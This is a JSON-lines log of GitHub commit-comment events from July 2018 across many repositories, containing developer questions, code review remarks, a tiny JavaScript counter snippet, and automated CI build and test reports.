{"id":"8026019531","type":"CommitCommentEvent","actor":{"login":"sashaba"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":29852512,"position":null,"line":null,"path":null,"commit_id":"0d43751cabad7270d5f773005b3b20d17e078b62","created_at":"2018-07-27T01:17:11Z","updated_at":"2018-07-27T01:17:11Z","author_association":"NONE","body":"I modified my react.gradle with this code and still can't build APK, i got duplicate file error\r\n(all images inside this folder) `android/app/src/main/res/drawable-mdpi/ ` and \r\n(all images inside this folder) `/android/app/build/generated/res/react/release/drawable-mdpi/`\r\n somebody please help me."}},"created_at":"2018-07-27T01:17:11Z"}
{"id":"8026021802","type":"CommitCommentEvent","actor":{"login":"chilijung"},"repo":{"name":"Canner/canner"},"payload":{"comment":{"id":29852517,"position":4,"line":47,"path":"src/hocs/validation.js","commit_id":"ddcad10568fd410573e9550ed5d5dfe050c6fed5","created_at":"2018-07-27T01:18:07Z","updated_at":"2018-07-27T01:18:07Z","author_association":"MEMBER","body":"@abz53378 I think the original required message is better, what makes you want to change?"}},"created_at":"2018-07-27T01:18:07Z"}
{"id":"8026022843","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29852521,"position":null,"line":null,"path":null,"commit_id":"6d3facc741cab8cd093a7affcddacee8abb6832d","created_at":"2018-07-27T01:18:34Z","updated_at":"2018-07-27T01:18:34Z","author_association":"NONE","body":"158069813_#5675 (Nigusse) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2328 of 2328 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6d3facc741cab8cd093a7affcddacee8abb6832d-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6d3facc741cab8cd093a7affcddacee8abb6832d-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6d3facc741cab8cd093a7affcddacee8abb6832d-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.18%25-green.png)</a>\n"}},"created_at":"2018-07-27T01:18:34Z"}
{"id":"8026023267","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29852522,"position":null,"line":null,"path":null,"commit_id":"05f996295ef32743aa9fa8969d8a54ba4e3cf1bd","created_at":"2018-07-27T01:18:44Z","updated_at":"2018-07-27T01:18:44Z","author_association":"OWNER","body":"Build version: __`0.10.0-master.253`__ :crossed_fingers: [`master`](https://github.com/streamich/ci-scripts/tree/master) on [*CircleCI*](https://circleci.com/gh/streamich/ci-scripts/253) :tada:"}},"created_at":"2018-07-27T01:18:44Z"}
{"id":"8026024931","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29852526,"position":null,"line":null,"path":null,"commit_id":"05f996295ef32743aa9fa8969d8a54ba4e3cf1bd","created_at":"2018-07-27T01:19:27Z","updated_at":"2018-07-27T01:19:27Z","author_association":"OWNER","body":"Build version: __`0.10.0-master.383`__ :crossed_fingers: [`master`](https://github.com/streamich/ci-scripts/tree/master) on [*Travis*](https://travis-ci.org/streamich/ci-scripts/builds/408761416) :tada:"}},"created_at":"2018-07-27T01:19:27Z"}
{"id":"8026025871","type":"CommitCommentEvent","actor":{"login":"MrGaabriel"},"repo":{"name":"DiscordProgramming/PyBot"},"payload":{"comment":{"id":29852528,"position":null,"line":null,"path":null,"commit_id":"a4edcc518f95458a780a95178fd1c5fe054a75bb","created_at":"2018-07-27T01:19:49Z","updated_at":"2018-07-27T01:19:49Z","author_association":"NONE","body":"Closes #1."}},"created_at":"2018-07-27T01:19:49Z"}
{"id":"8026026065","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29852529,"position":null,"line":null,"path":null,"commit_id":"6d3facc741cab8cd093a7affcddacee8abb6832d","created_at":"2018-07-27T01:19:55Z","updated_at":"2018-07-27T01:19:55Z","author_association":"NONE","body":"158069813_#5675 (Nigusse) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6d3facc741cab8cd093a7affcddacee8abb6832d-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-27T01:19:55Z"}
{"id":"8026048836","type":"CommitCommentEvent","actor":{"login":"hyunsukcha"},"repo":{"name":"hyunsukcha/sk4549131"},"payload":{"comment":{"id":29852568,"position":null,"line":null,"path":null,"commit_id":"1a2298c9f7b517fccce58ced9991a93d6bff853a","created_at":"2018-07-27T01:29:33Z","updated_at":"2018-07-27T01:29:33Z","author_association":"OWNER","body":"나는 빢빢이다"}},"created_at":"2018-07-27T01:29:33Z"}
{"id":"8026050454","type":"CommitCommentEvent","actor":{"login":"aivve"},"repo":{"name":"seredat/karbowanec"},"payload":{"comment":{"id":29852571,"position":null,"line":null,"path":null,"commit_id":"c6958302f07971825a8ca3c76f55c77bb5f214d6","created_at":"2018-07-27T01:30:13Z","updated_at":"2018-07-27T01:30:13Z","author_association":"COLLABORATOR","body":"This breaks compatibility with GUI2 and Lite wallets, therefore, is reverted."}},"created_at":"2018-07-27T01:30:13Z"}
{"id":"8026059001","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29852591,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-27T01:33:40Z","updated_at":"2018-07-27T01:33:40Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-27T01:33:40Z"}
{"id":"8026059906","type":"CommitCommentEvent","actor":{"login":"ZahirovicR"},"repo":{"name":"ZahirovicR/frontendcodelouisville"},"payload":{"comment":{"id":29852594,"position":null,"line":null,"path":null,"commit_id":"3cf1f57e483085243a4de18013694fd39ae26e7a","created_at":"2018-07-27T01:34:03Z","updated_at":"2018-07-27T01:34:03Z","author_association":"OWNER","body":"don't need it "}},"created_at":"2018-07-27T01:34:03Z"}
{"id":"8026060043","type":"CommitCommentEvent","actor":{"login":"tarbear123"},"repo":{"name":"marcus-darden/arduino-yahtzee"},"payload":{"comment":{"id":29852595,"position":null,"line":null,"path":null,"commit_id":"5f16c9b1b82c86f930d852df0235e193abfe4e31","created_at":"2018-07-27T01:34:06Z","updated_at":"2018-07-27T01:34:06Z","author_association":"NONE","body":"can you play this on a arduino that has a LCD keypad shield attached?"}},"created_at":"2018-07-27T01:34:06Z"}
{"id":"8026060726","type":"CommitCommentEvent","actor":{"login":"oyqa"},"repo":{"name":"oyqa/hello-world"},"payload":{"comment":{"id":29852597,"position":2,"line":2,"path":"README.md","commit_id":"1b3bc5e2920626df9041755fcabb67d9d66de89c","created_at":"2018-07-27T01:34:23Z","updated_at":"2018-07-27T01:34:23Z","author_association":"OWNER","body":"this is ok"}},"created_at":"2018-07-27T01:34:23Z"}
{"id":"8026061367","type":"CommitCommentEvent","actor":{"login":"houjb"},"repo":{"name":"romanchereshnev/HuGaDB"},"payload":{"comment":{"id":29852598,"position":null,"line":null,"path":null,"commit_id":"f99dbf85b38e4cd79ccaec70ee12ae9d68f3ad22","created_at":"2018-07-27T01:34:40Z","updated_at":"2018-07-27T01:34:40Z","author_association":"NONE","body":"Congratulations,I hope to receive your article as soon as possible.\r\n"}},"created_at":"2018-07-27T01:34:40Z"}
{"id":"8026063474","type":"CommitCommentEvent","actor":{"login":"nswekosk"},"repo":{"name":"obeattie/quadtree"},"payload":{"comment":{"id":29852604,"position":30,"line":152,"path":"quadtree.go","commit_id":"da3e421f0e688973042fd6846d96290a02bf0309","created_at":"2018-07-27T01:35:34Z","updated_at":"2018-07-27T01:35:34Z","author_association":"NONE","body":"Hello @obeattie. I'm a fan of your unit tests for this repo. I noticed that you have removed the implicit initialization for many of the objects in this repo. I find this interesting. Would you mind if I ask why you did this?"}},"created_at":"2018-07-27T01:35:34Z"}
{"id":"8026068455","type":"CommitCommentEvent","actor":{"login":"ChrisMags"},"repo":{"name":"ChrisMags/App-Demo"},"payload":{"comment":{"id":29852618,"position":13,"line":21,"path":"index.html","commit_id":"061f00c520028334109b667fb3f2b0dd7902d8d3","created_at":"2018-07-27T01:37:40Z","updated_at":"2018-07-27T01:37:40Z","author_association":"OWNER","body":"<script>\r\nvar x=0;\r\nfunction  Clickme(){\r\nx=x+1;\r\nif (x > 20) {\r\n    x=0;\r\n\talert(\"You exceed the number!\");\r\n}\r\ndocument.getElementById(\"display\").innerHTML=x\r\n}\r\n</script>"}},"created_at":"2018-07-27T01:37:40Z"}
{"id":"8026069958","type":"CommitCommentEvent","actor":{"login":"TaoLv"},"repo":{"name":"lihaofd/incubator-mxnet"},"payload":{"comment":{"id":29852621,"position":null,"line":null,"path":null,"commit_id":"aa8be5d8631b621754d936bd35f0618b245ed048","created_at":"2018-07-27T01:38:14Z","updated_at":"2018-07-27T01:38:14Z","author_association":"NONE","body":"Could you split quantization and dequantization into seperated functions? @xinyu-intel"}},"created_at":"2018-07-27T01:38:14Z"}
{"id":"8026074599","type":"CommitCommentEvent","actor":{"login":"alwayzoverdozed"},"repo":{"name":"213AnothaLostSoulsProduct/overdozedsorry"},"payload":{"comment":{"id":29852626,"position":null,"line":null,"path":null,"commit_id":"19700303b5b0324f97a967fc769ccb2fa18dc4ed","created_at":"2018-07-27T01:40:02Z","updated_at":"2018-07-27T01:40:02Z","author_association":"CONTRIBUTOR","body":"hey i found how to finally get back in here nice hi ya'll had lost the way here!! maNNN!! i SAY"}},"created_at":"2018-07-27T01:40:02Z"}
{"id":"8026074779","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29852627,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-27T01:40:06Z","updated_at":"2018-07-27T01:40:06Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-27T01:40:06Z"}
{"id":"8026077573","type":"CommitCommentEvent","actor":{"login":"alwayzoverdozed"},"repo":{"name":"213AnothaLostSoulsProduct/overdozedsorry"},"payload":{"comment":{"id":29852639,"position":null,"line":null,"path":null,"commit_id":"19700303b5b0324f97a967fc769ccb2fa18dc4ed","created_at":"2018-07-27T01:41:12Z","updated_at":"2018-07-27T01:41:12Z","author_association":"CONTRIBUTOR","body":"gave my windows p.c and laptop to my sis she just gaduated thats why first one in my side of guatemala family to do it and in our country goes to show whom needs america!! ?"}},"created_at":"2018-07-27T01:41:12Z"}
{"id":"8026077630","type":"CommitCommentEvent","actor":{"login":"ribua"},"repo":{"name":"ribua/mystuff"},"payload":{"comment":{"id":29852640,"position":null,"line":null,"path":null,"commit_id":"fda36f61cde3ec26d10824bb0985ad2cd630c19d","created_at":"2018-07-27T01:41:13Z","updated_at":"2018-07-27T01:41:13Z","author_association":"OWNER","body":"changed"}},"created_at":"2018-07-27T01:41:13Z"}
{"id":"8026080512","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29852649,"position":null,"line":null,"path":null,"commit_id":"dfb96fb464dd848bca0086b803e95bbbd7e1d7c0","created_at":"2018-07-27T01:42:24Z","updated_at":"2018-07-27T01:42:24Z","author_association":"NONE","body":"FanEnergyIndex (XuanLuoLBL) - x86_64-MacOS-10.9-clang: OK (2951 of 2951 tests passed, 624 test warnings)\n\nMessages:\n\n * 624 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-dfb96fb464dd848bca0086b803e95bbbd7e1d7c0-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-dfb96fb464dd848bca0086b803e95bbbd7e1d7c0-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-27T01:42:24Z"}
{"id":"8026082042","type":"CommitCommentEvent","actor":{"login":"ripplelabs-jenkins"},"repo":{"name":"ximinez/rippled"},"payload":{"comment":{"id":29852650,"position":null,"line":null,"path":null,"commit_id":"0028df3788377297afd51704d9b925db89a03403","created_at":"2018-07-27T01:43:04Z","updated_at":"2018-07-27T01:43:04Z","author_association":"COLLABORATOR","body":"\n## Jenkins Build Summary\n\nBuilt from [this commit](https://github.com/ximinez/rippled/commit/0028df3788377297afd51704d9b925db89a03403)\n\nBuilt at __20180727 - 01:43:04__\n\n### Test Results\n\nBuild Type | Log | Result | Status\n---------- | --- | ------ | ------\nmsvc.debug | [console](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/24//console) | no test results, t: n/a | FAIL :red_circle: \ncoverage | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/24//artifact/coverage.txt) | 1035 cases, 6 failed, t: 588s | FAIL :red_circle: \ndocs | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/24//artifact/docs.txt) | 1 cases, 0 failed, t: 2s | PASS :white_check_mark: \ngcc.release.unity <br/>-Dassert=true, <br/>MANUAL_TESTS=true | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/24//artifact/gcc.release.unity_Dassert_true_MANUAL_TESTS_true.txt) | 1101 cases, 0 failed, t: 809s | PASS :white_check_mark: \nclang.debug.unity | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/24//artifact/clang.debug.unity.txt) | 1035 cases, 6 failed, t: 256s | FAIL :red_circle: \nclang.debug.nounity | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/24//artifact/clang.debug.nounity.txt) | 1033 cases, 6 failed, t: 169s | FAIL :red_circle: \nclang.debug.unity, <br/>PARALLEL_TESTS=false | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/24//artifact/clang.debug.unity_PARALLEL_TESTS_false.txt) | 1035 cases, 6 failed, t: 500s | FAIL :red_circle: \ngcc.debug.unity | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/24//artifact/gcc.debug.unity.txt) | 1035 cases, 6 failed, t: 253s | FAIL :red_circle: \nclang.release.unity <br/>-Dassert=true | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/24//artifact/clang.release.unity_Dassert_true.txt) | 1034 cases, 6 failed, t: 342s | FAIL :red_circle: \ngcc.debug.nounity | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/24//artifact/gcc.debug.nounity.txt) | 1033 cases, 6 failed, t: 473s | FAIL :red_circle: \nmsvc.debug, <br/>PROJECT_NAME=rippled_classic | [console](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/24//console) | no test results, t: n/a | FAIL :red_circle: \ngcc.release.unity <br/>-Dassert=true | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/24//artifact/gcc.release.unity_Dassert_true.txt) | 1034 cases, 6 failed, t: 359s | FAIL :red_circle: \ngcc.debug.unity <br/>-Dstatic=true | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/24//artifact/gcc.debug.unity_Dstatic_true.txt) | 1035 cases, 6 failed, t: 254s | FAIL :red_circle: \nrpm | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/24//artifact/rpm.txt) | 1034 cases, 6 failed, t: n/a | FAIL :red_circle: \nmsvc.release | [console](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/24//console) | no test results, t: n/a | FAIL :red_circle: \n\n"}},"created_at":"2018-07-27T01:43:04Z"}
{"id":"8026082318","type":"CommitCommentEvent","actor":{"login":"alwayzoverdozed"},"repo":{"name":"213AnothaLostSoulsProduct/overdozedsorry"},"payload":{"comment":{"id":29852652,"position":null,"line":null,"path":null,"commit_id":"19700303b5b0324f97a967fc769ccb2fa18dc4ed","created_at":"2018-07-27T01:43:12Z","updated_at":"2018-07-27T01:43:12Z","author_association":"CONTRIBUTOR","body":"oh! FORGOT OVERDOZED ESCOBAR HERE BUT CAN ANYONE LOOK AT NUMBERONEMUSIC SEE HOW THEY SET THEirs UP THEir WEB SITE OK SiMILLAR BUT WiTH A VOTiNG SECTIOMN HOW CAN I GET THAT PULLED OFF!! PLEASE HELP O.D!!"}},"created_at":"2018-07-27T01:43:12Z"}
{"id":"8026082321","type":"CommitCommentEvent","actor":{"login":"ribua"},"repo":{"name":"ribua/mystuff"},"payload":{"comment":{"id":29852653,"position":null,"line":null,"path":null,"commit_id":"7ce1978d2d44a42f22deb3a707ddfaf7c8c6734a","created_at":"2018-07-27T01:43:12Z","updated_at":"2018-07-27T01:43:12Z","author_association":"OWNER","body":"fsdfsfsfs"}},"created_at":"2018-07-27T01:43:12Z"}
{"id":"8026082463","type":"CommitCommentEvent","actor":{"login":"ribua"},"repo":{"name":"ribua/mystuff"},"payload":{"comment":{"id":29852654,"position":null,"line":null,"path":null,"commit_id":"7ce1978d2d44a42f22deb3a707ddfaf7c8c6734a","created_at":"2018-07-27T01:43:15Z","updated_at":"2018-07-27T01:43:15Z","author_association":"OWNER","body":"fsfsdfs"}},"created_at":"2018-07-27T01:43:15Z"}
{"id":"8026082774","type":"CommitCommentEvent","actor":{"login":"ribua"},"repo":{"name":"ribua/mystuff"},"payload":{"comment":{"id":29852655,"position":null,"line":null,"path":null,"commit_id":"7ce1978d2d44a42f22deb3a707ddfaf7c8c6734a","created_at":"2018-07-27T01:43:23Z","updated_at":"2018-07-27T01:43:23Z","author_association":"OWNER","body":"fsfsfsf"}},"created_at":"2018-07-27T01:43:23Z"}
{"id":"8026084635","type":"CommitCommentEvent","actor":{"login":"kindunq"},"repo":{"name":"kindunq/express_cookie"},"payload":{"comment":{"id":29852659,"position":5,"line":5,"path":"nodejs/cookie.js","commit_id":"9be75283d5ccaed527d38eb31b0ccf812cdb7da3","created_at":"2018-07-27T01:44:09Z","updated_at":"2018-07-27T01:44:09Z","author_association":"OWNER","body":"empty"}},"created_at":"2018-07-27T01:44:09Z"}
{"id":"8026087565","type":"CommitCommentEvent","actor":{"login":"yudian1994"},"repo":{"name":"AshamaneProject/AshamaneCore"},"payload":{"comment":{"id":29852664,"position":null,"line":null,"path":null,"commit_id":"f4dc461056389e9148762a5159142493a7f0ce61","created_at":"2018-07-27T01:45:20Z","updated_at":"2018-07-27T01:45:20Z","author_association":"NONE","body":"This commit seems to have an error in boss_feng.cpp or at least that shows me my visual studio 2017 so it does not finish the compilation of worldserver\r\n\r\n\r\n![error de compilacion](https://user-images.githubusercontent.com/35294381/43297063-01955ee0-911d-11e8-929e-48d75b48ffec.PNG)\r\n"}},"created_at":"2018-07-27T01:45:20Z"}
{"id":"8026090948","type":"CommitCommentEvent","actor":{"login":"Xc1d30us-Mercy"},"repo":{"name":"Xc1d30us-Mercy/rpg-dice"},"payload":{"comment":{"id":29852669,"position":null,"line":null,"path":null,"commit_id":"a246e1f3e1beb94100597480906590865938281d","created_at":"2018-07-27T01:46:41Z","updated_at":"2018-07-27T01:46:41Z","author_association":"OWNER","body":"Appending >\r\nDice roller has no attribute throw. Dice thrower does however and the outputs match what was originally put"}},"created_at":"2018-07-27T01:46:41Z"}
{"id":"8026093745","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MEWconnect-landing-page"},"payload":{"comment":{"id":29852677,"position":null,"line":null,"path":null,"commit_id":"b278314610fb53b1b2232072dab6936e7f482e5b","created_at":"2018-07-27T01:47:52Z","updated_at":"2018-07-27T01:47:52Z","author_association":"NONE","body":"Copy of this build can be found at https://mewc.mewbuilds.com/build/b278314610fb53b1b2232072dab6936e7f482e5b/index.html"}},"created_at":"2018-07-27T01:47:52Z"}
{"id":"8026093911","type":"CommitCommentEvent","actor":{"login":"Chinhtx73"},"repo":{"name":"Chinhtx73/MyRepository"},"payload":{"comment":{"id":29852679,"position":null,"line":null,"path":null,"commit_id":"75059f476a64f14976566692c30538daa43703d6","created_at":"2018-07-27T01:47:55Z","updated_at":"2018-07-27T01:47:55Z","author_association":"OWNER","body":"hello my name is TXC"}},"created_at":"2018-07-27T01:47:55Z"}
{"id":"8026098211","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29852693,"position":null,"line":null,"path":null,"commit_id":"00b7483b5b50f7e4bb5018976b57fec6cbe53cd4","created_at":"2018-07-27T01:49:41Z","updated_at":"2018-07-27T01:49:41Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-27T01:49:41Z"}
{"id":"8026100697","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29852696,"position":null,"line":null,"path":null,"commit_id":"70b7d899f362d29d4337225596139b7aea03fdfe","created_at":"2018-07-27T01:50:38Z","updated_at":"2018-07-27T01:50:38Z","author_association":"NONE","body":"kiva-longwave (nealkruis) - Win64-Windows-7-VisualStudio-14: OK (2954 of 2956 tests passed, 2 test warnings)\n\nMessages:\n\n * 4 tests had: EIO diffs.\n * 2 tests had: ESO small diffs.\n * 1 test had: Table small diffs.\n * 2 tests had: ESO big diffs.\n * 2 tests had: Table big diffs.\n * 1 test had: MTR small diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 621\n * Failed: 2\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-70b7d899f362d29d4337225596139b7aea03fdfe-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-70b7d899f362d29d4337225596139b7aea03fdfe-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.93%25-yellow.png)</a> \n"}},"created_at":"2018-07-27T01:50:38Z"}
{"id":"8026102299","type":"CommitCommentEvent","actor":{"login":"jdm"},"repo":{"name":"servo/saltfs"},"payload":{"comment":{"id":29852701,"position":4,"line":55,"path":"buildbot/master/files/config/environments.py","commit_id":"2f889fa2ae6b45571616317aca9c86f9182c570a","created_at":"2018-07-27T01:51:18Z","updated_at":"2018-07-27T01:51:18Z","author_association":"MEMBER","body":"Let's use common.servo_home instead of hardcoding the path here."}},"created_at":"2018-07-27T01:51:18Z"}
{"id":"8026102785","type":"CommitCommentEvent","actor":{"login":"jdm"},"repo":{"name":"servo/saltfs"},"payload":{"comment":{"id":29852704,"position":16,"line":110,"path":"buildbot/master/files/config/environments.py","commit_id":"2f889fa2ae6b45571616317aca9c86f9182c570a","created_at":"2018-07-27T01:51:30Z","updated_at":"2018-07-27T01:51:30Z","author_association":"MEMBER","body":"Same here."}},"created_at":"2018-07-27T01:51:30Z"}
{"id":"8026106210","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29852712,"position":null,"line":null,"path":null,"commit_id":"ad26fa97fc0067e861fdf0b51cc3c47f6c419667","created_at":"2018-07-27T01:52:50Z","updated_at":"2018-07-27T01:52:50Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [jfussionfo](https://jfussionfo-static-docs.pantheonsite.io/docs) Multidev environment:\n- [/docs/modules-plugins-known-issues](https://jfussionfo-static-docs.pantheonsite.io/docs/modules-plugins-known-issues)\n"}},"created_at":"2018-07-27T01:52:50Z"}
{"id":"8026106507","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29852713,"position":null,"line":null,"path":null,"commit_id":"98953cf810e2f73d15455f6ed41ff09c7170e045","created_at":"2018-07-27T01:52:56Z","updated_at":"2018-07-27T01:52:56Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [jfussionfo](https://jfussionfo-static-docs.pantheonsite.io/docs) Multidev environment:\n- [/docs/modules-plugins-known-issues](https://jfussionfo-static-docs.pantheonsite.io/docs/modules-plugins-known-issues)\n"}},"created_at":"2018-07-27T01:52:56Z"}
{"id":"8026108020","type":"CommitCommentEvent","actor":{"login":"DevinFu2016"},"repo":{"name":"toby0077/risk_estimate_system"},"payload":{"comment":{"id":29852715,"position":null,"line":null,"path":null,"commit_id":"0a65efe562cdaead0b257522fbd15fadb9548629","created_at":"2018-07-27T01:53:31Z","updated_at":"2018-07-27T01:53:31Z","author_association":"NONE","body":"Thank you for sharing. Could you please tell me the decompression password."}},"created_at":"2018-07-27T01:53:31Z"}
{"id":"8026109324","type":"CommitCommentEvent","actor":{"login":"1314wu"},"repo":{"name":"1314wu/1314wu.github.io"},"payload":{"comment":{"id":29852717,"position":null,"line":null,"path":null,"commit_id":"db078cd727336fa71597941791a8bbbf7770db96","created_at":"2018-07-27T01:54:01Z","updated_at":"2018-07-27T01:54:01Z","author_association":"OWNER","body":"server of my Wechat Offical Accounts"}},"created_at":"2018-07-27T01:54:01Z"}
{"id":"8026117156","type":"CommitCommentEvent","actor":{"login":"dklages20"},"repo":{"name":"dklages20/Contact-Application"},"payload":{"comment":{"id":29852729,"position":1,"line":1,"path":"ContactApplication/SQL/create_user_table.sql","commit_id":"b526ff19c817ce67ec5855ee4c647c3b1b846b58","created_at":"2018-07-27T01:56:56Z","updated_at":"2018-07-27T01:56:56Z","author_association":"OWNER","body":"can look into change size of variables for what is needed"}},"created_at":"2018-07-27T01:56:56Z"}
{"id":"8026118165","type":"CommitCommentEvent","actor":{"login":"dklages20"},"repo":{"name":"dklages20/Contact-Application"},"payload":{"comment":{"id":29852730,"position":8,"line":8,"path":"ContactApplication/SQL/create_user_table.sql","commit_id":"b526ff19c817ce67ec5855ee4c647c3b1b846b58","created_at":"2018-07-27T01:57:19Z","updated_at":"2018-07-27T01:57:19Z","author_association":"OWNER","body":"maybe insert _id or something to make ids \"exclusive\""}},"created_at":"2018-07-27T01:57:19Z"}
{"id":"8026118474","type":"CommitCommentEvent","actor":{"login":"huderlem"},"repo":{"name":"huderlem/pokeruby"},"payload":{"comment":{"id":29852731,"position":null,"line":null,"path":null,"commit_id":"0edf1a6667ffe6b9f330075d8d74c2264f9e51a9","created_at":"2018-07-27T01:57:25Z","updated_at":"2018-07-27T01:57:25Z","author_association":"OWNER","body":"This outputs the following content into a file called `build/ruby/generated/weather.inc`\r\n```\r\n.equiv WEATHER_NONE, 0\r\n.equiv WEATHER_CLOUDS, 1\r\n.equiv WEATHER_SUNNY, 2\r\n.equiv WEATHER_RAIN_LIGHT, 3\r\n.equiv WEATHER_SNOW, 4\r\n.equiv WEATHER_RAIN_MED, 5\r\n.equiv WEATHER_FOG_1, 6\r\n.equiv WEATHER_ASH, 7\r\n.equiv WEATHER_SANDSTORM, 8\r\n.equiv WEATHER_FOG_2, 9\r\n.equiv WEATHER_FOG_3, 10\r\n.equiv WEATHER_SHADE, 11\r\n.equiv WEATHER_DROUGHT, 12\r\n.equiv WEATHER_RAIN_HEAVY, 13\r\n.equiv WEATHER_BUBBLES, 14\r\n.equiv WEATHER_ROUTE119_CYCLE, 20\r\n.equiv WEATHER_ROUTE123_CYCLE, 21\r\n.equiv COORD_EVENT_WEATHER_CLOUDS, 0\r\n.equiv COORD_EVENT_WEATHER_SUNNY, 1\r\n.equiv COORD_EVENT_WEATHER_RAIN_LIGHT, 2\r\n.equiv COORD_EVENT_WEATHER_SNOW, 3\r\n.equiv COORD_EVENT_WEATHER_RAIN_MED, 4\r\n.equiv COORD_EVENT_WEATHER_FOG_1, 5\r\n.equiv COORD_EVENT_WEATHER_FOG_2, 6\r\n.equiv COORD_EVENT_WEATHER_ASH, 7\r\n.equiv COORD_EVENT_WEATHER_SANDSTORM, 8\r\n.equiv COORD_EVENT_WEATHER_SHADE, 9\r\n.equiv COORD_EVENT_WEATHER_DROUGHT, 10\r\n.equiv COORD_EVENT_WEATHER_ROUTE119_CYCLE, 20\r\n.equiv COORD_EVENT_WEATHER_ROUTE123_CYCLE, 21\r\n```"}},"created_at":"2018-07-27T01:57:25Z"}
